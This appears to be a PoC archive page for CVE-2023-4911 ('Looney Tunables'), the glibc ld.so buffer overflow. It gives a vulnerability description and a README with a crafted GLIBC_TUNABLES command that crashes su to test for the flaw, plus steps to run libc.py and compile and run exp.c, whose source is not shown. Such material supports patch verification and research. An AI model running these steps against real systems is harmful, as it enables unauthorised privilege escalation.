Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-4911 PoC — Glibc: buffer overflow in ld.so leading to privilege escalation

Source
Associated Vulnerability
Title:Glibc: buffer overflow in ld.so leading to privilege escalation (CVE-2023-4911)
Description:A buffer overflow was discovered in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES environment variable. This issue could allow a local attacker to use maliciously crafted GLIBC_TUNABLES environment variables when launching binaries with SUID permission to execute code with elevated privileges.
Description
Looney Tunables CVE-2023-4911
Readme
### Step 1

Check the `glibc` version
```
ldd --version
```

Check if a machine is vulnerable to Looney Tunables CVE-2023-4911
```
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help
```

If we get a `Segmentation fault (core dumped)`, then machine is vulnerable.

### Step 2
```
python3 libc.py
```

### Step 3
```
gcc -o exp exp.c
./exp
```
File Snapshot

[4.0K] /data/pocs/242265bc434efd79dc46f9f358622301e3970833 ├── [ 16K] exp ├── [3.7K] exp.c ├── [ 671] libc.py └── [ 401] README.md 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →